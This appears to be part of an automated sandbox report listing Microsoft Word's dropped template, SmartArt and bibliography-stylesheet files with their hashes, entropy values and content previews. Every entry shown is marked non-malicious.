                                    SSDEEP:6144:ydkJ3yU0orh0SCLVXyMFsoiOjWIm4vW2uo4hfhf7v3uH4NYYP4BpBaZTTSSamEUD:b
                                    MD5:0C9731C90DD24ED5CA6AE283741078D0
                                    SHA1:BDD3D7E5B0DE9240805EA53EF2EB784A4A121064
                                    SHA-256:ABCE25D1EB3E70742EC278F35E4157EDB1D457A7F9D002AC658AAA6EA4E4DCDF
                                    SHA-512:A39E6201D6B34F37C686D9BD144DDD38AE212EDA26E3B81B06F1776891A90D84B65F2ABC5B8F546A7EFF3A62D35E432AF0254E2F5BFE4AA3E0CF9530D25949C0
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2006</xsl:text>.....</xsl:when>.. <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameL
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):242
                                    Entropy (8bit):3.4938093034530917
                                    Encrypted:false
                                    SSDEEP:6:fxnxUX44lWWoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyvToGHmD0+dAH/luWvv
                                    MD5:A6B2731ECC78E7CED9ED5408AB4F2931
                                    SHA1:BA15D036D522978409846EA682A1D7778381266F
                                    SHA-256:6A2F9E46087B1F0ED0E847AF05C4D4CC9F246989794993E8F3E15B633EFDD744
                                    SHA-512:666926612E83A7B4F6259C3FFEC3185ED3F07BDC88D43796A24C3C9F980516EB231BDEA4DC4CC05C6D7714BA12AE2DCC764CD07605118698809DEF12A71F1FDD
                                    Malicious:false
                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.a.b.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                    Category:dropped
                                    Size (bytes):4888
                                    Entropy (8bit):7.8636569313247335
                                    Encrypted:false
                                    SSDEEP:96:StrFZ23/juILHPzms5UTuK9CuZGEoEuZ28H1HiGa2RnnLY+tUb:SPZQ7uCHPzms5UTlqauZVHdJRnLY+tUb
                                    MD5:0A4CA91036DC4F3CD8B6DBF18094CF25
                                    SHA1:6C7EED2530CD0032E9EEAB589AFBC296D106FBB9
                                    SHA-256:E5A56CCB3B3898F76ABF909209BFAB401B5DDCD88289AD43CE96B02989747E50
                                    SHA-512:7C69426F2250E8C84368E8056613C22977630A4B3F5B817FB5EA69081CE2A3CA6E5F93DF769264253D5411419AF73467A27F0BB61291CCDE67D931BD0689CB66
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):256
                                    Entropy (8bit):3.4842773155694724
                                    Encrypted:false
                                    SSDEEP:6:fxnxUXDAlIJAFIloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyMlI7loGHmD0+dAH/luWvv
                                    MD5:923D406B2170497AD4832F0AD3403168
                                    SHA1:A77DA08C9CB909206CDE42FE1543B9FE96DF24FB
                                    SHA-256:EBF9CF474B25DDFE0F6032BA910D5250CBA2F5EDF9CF7E4B3107EDB5C13B50BF
                                    SHA-512:A4CD8C74A3F916CA6B15862FCA83F17F2B1324973CCBCC8B6D9A8AEE63B83A3CD880DC6821EEADFD882D74C7EF58FA586781DED44E00E8B2ABDD367B47CE45B7
                                    Malicious:false
                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .C.o.n.v.e.r.g.i.n.g.T.e.x.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                    Category:dropped
                                    Size (bytes):11380
                                    Entropy (8bit):7.891971054886943
                                    Encrypted:false
                                    SSDEEP:192:VJcnLYnAVbOFLaCPLrGGbhaWEu6d3RmryqLkeAShObPb1AYcRMMXjkfa0nYBwggD:VcMC8lLrRbhy1ZqLyShYb1FHQ4C0nYQJ
                                    MD5:C9F9364C659E2F0C626AC0D0BB519062
                                    SHA1:C4036C576074819309D03BB74C188BF902D1AE00
                                    SHA-256:6FC428CA0DCFC27D351736EF16C94D1AB08DDA50CB047A054F37EC028DD08AA2
                                    SHA-512:173A5E68E55163B081C5A8DA24AE46428E3FB326EBE17AE9588C7F7D7E5E5810BFCF08C23C3913D6BEC7369E06725F50387612F697AC6A444875C01A2C94D0FF
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):238
                                    Entropy (8bit):3.472155835869843
                                    Encrypted:false
                                    SSDEEP:6:fxnxUXGE2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny4GHmD0+dAH/luWvv
                                    MD5:2240CF2315F2EB448CEA6E9CE21B5AC5
                                    SHA1:46332668E2169E86760CBD975FF6FA9DB5274F43
                                    SHA-256:0F7D0BD5A8CED523CFF4F99D7854C0EE007F5793FA9E1BA1CD933B0894BFBD0D
                                    SHA-512:10BA73FF861112590BF135F4B337346F9D4ACEB10798E15DC5976671E345BC29AC8527C6052FEC86AA7058E06D1E49052E49D7BCF24A01DB259B5902DB091182
                                    Malicious:false
                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .r.i.n.g.s...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):5151
                                    Entropy (8bit):7.859615916913808
                                    Encrypted:false
                                    SSDEEP:96:WkV3UHhcZDEteEJqeSGzpG43GUR8m8b6dDLiCTfjKPnD6H5RhfuDKNtxx3+7tDLp:Wq3UBc9EJqIpGgD5dDL1DjKvDKhfnNti
                                    MD5:6C24ED9C7C868DB0D55492BB126EAFF8
                                    SHA1:C6D96D4D298573B70CF5C714151CF87532535888
                                    SHA-256:48AF17267AD75C142EFA7AB7525CA48FAB579592339FB93E92C4C4DA577D4C9F
                                    SHA-512:A3E9DC48C04DC8571289F57AE790CA4E6934FBEA4FDDC20CB780F7EA469FE1FC1D480A1DBB04D15301EF061DA5700FF0A793EB67D2811C525FEF618B997BCABD
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):286
                                    Entropy (8bit):3.4670546921349774
                                    Encrypted:false
                                    SSDEEP:6:fxnxUX0XPYDxUloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyEXPYDCloGHmD0+dAH/luWvv
                                    MD5:3D52060B74D7D448DC733FFE5B92CB52
                                    SHA1:3FBA3FFC315DB5B70BF6F05C4FF84B52A50FCCBC
                                    SHA-256:BB980559C6FC38B703D1E9C41720D5CE8D00D2FF86D4F25136DB02B1E54B1518
                                    SHA-512:952EF139A72562A528C1052F1942DAE1C0509D67654BF5E7C0602C87F90147E8EE9E251D2632BCB5B511AB2FF8A3734293D0A4E3DBD3D187F5E3C042685F9A0C
                                    Malicious:false
                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.h.e.m.e.P.i.c.t.u.r.e.A.l.t.e.r.n.a.t.i.n.g.A.c.c.e.n.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                    Category:dropped
                                    Size (bytes):5630
                                    Entropy (8bit):7.87271654296772
                                    Encrypted:false
                                    SSDEEP:96:n5ni6jKZWsD+QJaUQ7R6qYFF5QS+BEgeJam6S7ZCHuKViGa2CnnLYLt/ht:nccqxIBdQ1QS+uDJanS7ZCHHVdJCnLY5
                                    MD5:2F8998AA9CF348F1D6DE16EAB2D92070
                                    SHA1:85B13499937B4A584BEA0BFE60475FD4C73391B6
                                    SHA-256:8A216D16DEC44E02B9AB9BBADF8A11F97210D8B73277B22562A502550658E580
                                    SHA-512:F10F7772985EDDA442B9558127F1959FF0A9909C7B7470E62D74948428BFFF7E278739209E8626AE5917FF728AFB8619AE137BEE2A6A4F40662122208A41ABB2
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):256
                                    Entropy (8bit):3.464918006641019
                                    Encrypted:false
                                    SSDEEP:6:fxnxUXR+EqRGRnRE3QepmlJ0+3FbnKfZObdADxp1RDWlVwv:fxnyB+5RmRGHmD0wbnKYZAH+Vwv
                                    MD5:93149E194021B37162FD86684ED22401
                                    SHA1:1B31CAEBE1BBFA529092BE834D3B4AD315A6F8F1
                                    SHA-256:50BE99A154A6F632D49B04FCEE6BCA4D6B3B4B7C1377A31CE9FB45C462D697B2
                                    SHA-512:410A7295D470EC85015720B2B4AC592A472ED70A04103D200FA6874BEA6A423AF24766E98E5ACAA3A1DBC32C44E8790E25D4611CD6C0DBFFFE8219D53F33ACA7
                                    Malicious:false
                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .E.q.u.a.t.i.o.n.s...d.o.t.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.W.D. .D.o.c.u.m.e.n.t. .P.a.r.t.s.}.........
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Word 2007+
                                    Category:dropped
                                    Size (bytes):51826
                                    Entropy (8bit):5.541375256745271
                                    Encrypted:false
                                    SSDEEP:384:erH5dYPCA4t3aEFGiSUDtYfEbi5Ry/AT7/6tHODaFlDSomurYNfT4A0VIwWNS89u:Q6Cbh9tENyWdaFUSYNfZS89/3qtEu
                                    MD5:2AB22AC99ACFA8A82742E774323C0DBD
                                    SHA1:790F8B56DF79641E83A16E443A75A66E6AA2F244
                                    SHA-256:BC9D45D0419A08840093B0BF4DCF96264C02DFE5BD295CD9B53722E1DA02929D
                                    SHA-512:E5715C0ECF35CE250968BD6DE5744D28A9F57D20FD6866E2AF0B2D8C8F80FEDC741D48F554397D61C5E702DA896BD33EED92D778DBAC71E2E98DCFB0912DE07B
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):254
                                    Entropy (8bit):3.4721586910685547
                                    Encrypted:false
                                    SSDEEP:6:fxnxUX9+RclTloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyteUTloGHmD0+dAH/luWvv
                                    MD5:4DD225E2A305B50AF39084CE568B8110
                                    SHA1:C85173D49FC1522121AA2B0B2E98ADF4BB95B897
                                    SHA-256:6F00DD73F169C73D425CB9895DAC12387E21C6E4C9C7DDCFB03AC32552E577F4
                                    SHA-512:0493AB431004191381FF84AD7CC46BD09A1E0FEEC16B3183089AA8C20CC7E491FAE86FE0668A9AC677F435A203E494F5E6E9E4A0571962F6021D6156B288B28A
                                    Malicious:false
                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .c.h.e.v.r.o.n.a.c.c.e.n.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):4243
                                    Entropy (8bit):7.824383764848892
                                    Encrypted:false
                                    SSDEEP:96:22MQe4zHye8/djzF+JjvtmMkkBpF7e0LTkaf:22De4zHHCvF+nRBDXoaf
                                    MD5:7BC0A35807CD69C37A949BBD51880FF5
                                    SHA1:B5870846F44CAD890C6EFF2F272A037DA016F0D8
                                    SHA-256:BD3A013F50EBF162AAC4CED11928101554C511BD40C2488CF9F5842A375B50CA
                                    SHA-512:B5B785D693216E38B5AB3F401F414CADACCDCB0DCA4318D88FE1763CD3BAB8B7670F010765296613E8D3363E47092B89357B4F1E3242F156750BE86F5F7E9B8D
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):280
                                    Entropy (8bit):3.484503080761839
                                    Encrypted:false
                                    SSDEEP:6:fxnxUXGdQ1MecJZMlWlk2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny2dQ98MlWlzGHmD0+dAH/luWvv
                                    MD5:1309D172F10DD53911779C89A06BBF65
                                    SHA1:274351A1059868E9DEB53ADF01209E6BFBDFADFB
                                    SHA-256:C190F9E7D00E053596C3477455D1639C337C0BE01012C0D4F12DFCB432F5EC56
                                    SHA-512:31B38AD2D1FFF93E03BF707811F3A18AD08192F906E36178457306DDAB0C3D8D044C69DE575ECE6A4EE584800F827FB3C769F98EA650F1C208FEE84177070339
                                    Malicious:false
                                    Preview:[File] OriginalName: InterconnectedBlockProcess.glox Component: WordFiles ReqVer: 14 StoreLocation: {My Templates}\SmartArt Graphics
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                    Category:dropped
                                    Size (bytes):9191
                                    Entropy (8bit):7.93263830735235
                                    Encrypted:false
                                    SSDEEP:192:oeAMExvPJMg+yE+AfJLi3+Xoj7F3sPgMG61J88eDhFWT7hFNsdJtnLYJ7tSh:v2d+hnfJLi3+4ja4WqhFWT7FsdHMA
                                    MD5:08D3A25DD65E5E0D36ADC602AE68C77D
                                    SHA1:F23B6DDB3DA0015B1D8877796F7001CABA25EA64
                                    SHA-256:58B45B9DBA959F40294DA2A54270F145644E810290F71260B90F0A3A9FCDEBC1
                                    SHA-512:77D24C272D67946A3413D0BEA700A7519B4981D3B4D8486A655305546CE6133456321EE94FD71008CBFD678433EA1C834CFC147179B31899A77D755008FCE489
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):292
                                    Entropy (8bit):3.5026803317779778
                                    Encrypted:false
                                    SSDEEP:6:fxnxUXC89ADni8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyf9ADiNGHmD0wbnKYZAH/lMZqiv
                                    MD5:A0D51783BFEE86F3AC46A810404B6796
                                    SHA1:93C5B21938DA69363DBF79CE594C302344AF9D9E
                                    SHA-256:47B43E7DBDF8B25565D874E4E071547666B08D7DF4D736EA8521591D0DED640F
                                    SHA-512:CA3DB5A574745107E1D6CAA60E491F11D8B140637D4ED31577CC0540C12FDF132D8BC5EBABEA3222F4D7BA1CA016FF3D45FE7688D355478C27A4877E6C4D0D75
                                    Malicious:false
                                    Preview:[File] OriginalName: gosttitle.xsl Component: WordFiles ReqVer: 14 Executable: {WD} StoreLocation: {My Templates} Command: /f {FilePath}
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):251032
                                    Entropy (8bit):5.102652100491927
                                    Encrypted:false
                                    SSDEEP:6144:hwprA5R95vtfb8p4bgWPwW6/m26AnV9IBgIkqm6HITUZJcjUZS1XkaNPQTlvB2zr:JA
                                    MD5:F425D8C274A8571B625EE66A8CE60287
                                    SHA1:29899E309C56F2517C7D9385ECDBB719B9E2A12B
                                    SHA-256:DD7B7878427276AF5DBF8355ECE0D1FE5D693DF55AF3F79347F9D20AE50DB938
                                    SHA-512:E567F283D903FA533977B30FD753AA1043B9DDE48A251A9AC6777A3B67667443FEAD0003765A630D0F840B6C275818D2F903B6CB56136BEDCC6D9BDD20776564
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):286
                                    Entropy (8bit):3.5502940710609354
                                    Encrypted:false
                                    SSDEEP:6:fxnxUXfQICl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyXClNGHmD0wbnKYZAH/lMZqiv
                                    MD5:9B8D7EFE8A69E41CDC2439C38FE59FAF
                                    SHA1:034D46BEC5E38E20E56DD905E2CA2F25AF947ED1
                                    SHA-256:70042F1285C3CD91DDE8D4A424A5948AE8F1551495D8AF4612D59709BEF69DF2
                                    SHA-512:E50BB0C68A33D35F04C75F05AD4598834FEC7279140B1BB0847FF39D749591B8F2A0C94DA4897AAF6C33C50C1D583A836B0376015851910A77604F8396C7EF3C
                                    Malicious:false
                                    Preview:[File] OriginalName: iso690.xsl Component: WordFiles ReqVer: 14 Executable: {WD} StoreLocation: {My Templates} Command: /f {FilePath}
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):270198
                                    Entropy (8bit):5.073814698282113
                                    Encrypted:false
                                    SSDEEP:6144:JwprAiaR95vtfb8pDbgWPzDCvCmvQursq7vImej/yQ4SS1apSiQhHDOruvoVeMUX:We
                                    MD5:FF0E07EFF1333CDF9FC2523D323DD654
                                    SHA1:77A1AE0DD8DBC3FEE65DD6266F31E2A564D088A4
                                    SHA-256:3F925E0CC1542F09DE1F99060899EAFB0042BB9682507C907173C392115A44B5
                                    SHA-512:B4615F995FAB87661C2DBE46625AA982215D7BDE27CAFAE221DCA76087FE76DA4B4A381943436FCAC1577CB3D260D0050B32B7B93E3EB07912494429F126BB3D
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):332
                                    Entropy (8bit):3.4871192480632223
                                    Encrypted:false
                                    SSDEEP:6:fxnxUXsdDUaw93Ti8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyoRw9eNGHmD0wbnKYZAH/lMZqiv
                                    MD5:333BA58FCE326DEA1E4A9DE67475AA95
                                    SHA1:F51FAD5385DC08F7D3E11E1165A18F2E8A028C14
                                    SHA-256:66142D15C7325B98B199AB6EE6F35B7409DE64EBD5C0AB50412D18CBE6894097
                                    SHA-512:BFEE521A05B72515A8D4F7D13D8810846DC60F1E85C363FFEBD6CACD23AE8D2E664C563FC74700A4ED4E358F378508D25C46CB5BE1CF587E2E278EBC22BB2625
                                    Malicious:false
                                    Preview:[File] OriginalName: mlaseventheditionofficeonline.xsl Component: WordFiles ReqVer: 14 Executable: {WD} StoreLocation: {My Templates} Command: /f {FilePath}
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):254875
                                    Entropy (8bit):5.003842588822783
                                    Encrypted:false
                                    SSDEEP:6144:MwprAnniNgtfbzbOWPuv7kOMBLitjAUjTQLrYHwR0TnyDkHqV3iPr1zHX5T6SSXj:a
                                    MD5:377B3E355414466F3E3861BCE1844976
                                    SHA1:0B639A3880ACA3FD90FA918197A669CC005E2BA4
                                    SHA-256:4AC5B26C5E66E122DE80243EF621CA3E1142F643DD2AD61B75FF41CFEE3DFFAF
                                    SHA-512:B050AD52A8161F96CBDC880DD1356186F381B57159F5010489B04528DB798DB955F0C530465AB3ECD5C653586508429D98336D6EB150436F1A53ABEE0697AEB9
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>...</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />......<xsl:variable name="prop_EndChars">.....<xsl:call-template name="templ_prop_EndChars"/>....</xsl:variable>......<xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parameters" />......
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):274
                                    Entropy (8bit):3.438490642908344
                                    Encrypted:false
                                    SSDEEP:6:fxnxUXZlaWimoa2nRE3QepmlJ0+3FbnKfZObdADxp1RDWlVwv:fxnyplagN2RGHmD0wbnKYZAH+Vwv
                                    MD5:0F98498818DC28E82597356E2650773C
                                    SHA1:1995660972A978D17BC483FCB5EE6D15E7058046
                                    SHA-256:4587CA0B2A60728FF0A5B8E87D35BF6C6FDF396747E13436EC856612AC1C6288
                                    SHA-512:768562F20CFE15001902CCE23D712C7439721ECA6E48DDDCF8BFF4E7F12A3BC60B99C274CBADD0128EEA1231DB19808BAA878E825497F3860C381914C21B46FF
                                    Malicious:false
                                    Preview:[File] OriginalName: Element design set.dotx Component: WordFiles ReqVer: 14 Executable: {WD} StoreLocation: {WD Document Parts}
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Word 2007+
                                    Category:dropped
                                    Size (bytes):34415
                                    Entropy (8bit):7.352974342178997
                                    Encrypted:false
                                    SSDEEP:768:ev13NPo9o5NGEVIi3kvH+3SMdk7zp3tE2:ev13xoOE+R3BkR7
                                    MD5:7CDFFC23FB85AD5737452762FA36AAA0
                                    SHA1:CFBC97247959B3142AFD7B6858AD37B18AFB3237
                                    SHA-256:68A8FBFBEE4C903E17C9421082E839144C205C559AFE61338CBDB3AF79F0D270
                                    SHA-512:A0685FD251208B772436E9745DA2AA52BC26E275537688E3AB44589372D876C9ACE14B21F16EC4053C50EB4C8E11787E9B9D922E37249D2795C5B7986497033E
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):4026
                                    Entropy (8bit):7.809492693601857
                                    Encrypted:false
                                    SSDEEP:96:VpDCBFLhxaUGm5EWA07yNdKH1FQpy8tnX8Iz3b7TrT502+fPD:VpDYFFRMNU+RtXzLf35t+3D
                                    MD5:5D9BAD7ADB88CEE98C5203883261ACA1
                                    SHA1:FBF1647FCF19BCEA6C3CF4365C797338CA282CD2
                                    SHA-256:8CE600404BB3DB92A51B471D4AB8B166B566C6977C9BB63370718736376E0E2F
                                    SHA-512:7132923869A3DA2F2A75393959382599D7C4C05CA86B4B27271AB9EA95C7F2E80A16B45057F4FB729C9593F506208DC70AF2A635B90E4D8854AC06C787F6513D
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):250
                                    Entropy (8bit):3.4916022431157345
                                    Encrypted:false
                                    SSDEEP:6:fxnxUXsAl8xoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny8A8xoGHmD0+dAH/luWvv
                                    MD5:1A314B08BB9194A41E3794EF54017811
                                    SHA1:D1E70DB69CA737101524C75E634BB72F969464FF
                                    SHA-256:9025DD691FCAD181D5FD5952C7AA3728CD8A2CAF20DEA14930876419BED9B379
                                    SHA-512:AB29C8674A85711EABAE5F9559E9048FE91A2F51EB12D5A46152A310DE59F759DF8C617DA248798A7C20F60E26FBB1B0FC8DB47C46B098BCD26CF8CE78989ACA
                                    Malicious:false
                                    Preview:[File] OriginalName: BracketList.glox Component: WordFiles ReqVer: 14 StoreLocation: {My Templates}\SmartArt Graphics
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):246
                                    Entropy (8bit):3.5039994158393686
                                    Encrypted:false
                                    SSDEEP:6:fxnxUX4f+E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyvGHmD0+dAH/luWvv
                                    MD5:16711B951E1130126E240A6E4CC2E382
                                    SHA1:8095AA79AEE029FD06428244CA2A6F28408448DB
                                    SHA-256:855342FE16234F72DA0C2765455B69CF412948CFBE70DE5F6D75A20ACDE29AE9
                                    SHA-512:454EAA0FD669489583C317699BE1CE5D706C31058B08CF2731A7621FDEFB6609C2F648E02A7A4B2B3A3DFA8406A696D1A6FA5063DDA684BDA4450A2E9FEFB0EF
                                    Malicious:false
                                    Preview:[File] OriginalName: TabbedArc.glox Component: WordFiles ReqVer: 14 StoreLocation: {My Templates}\SmartArt Graphics
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                    Category:dropped
                                    Size (bytes):3683
                                    Entropy (8bit):7.772039166640107
                                    Encrypted:false
                                    SSDEEP:96:GyfQZd6ZHNCWl9aXFkZwIq/QDsRYPf8P9QtDIs5r:G6wYtNZS1k99AmPfSOtD5r
                                    MD5:E8308DA3D46D0BC30857243E1B7D330D
                                    SHA1:C7F8E54A63EB254C194A23137F269185E07F9D10
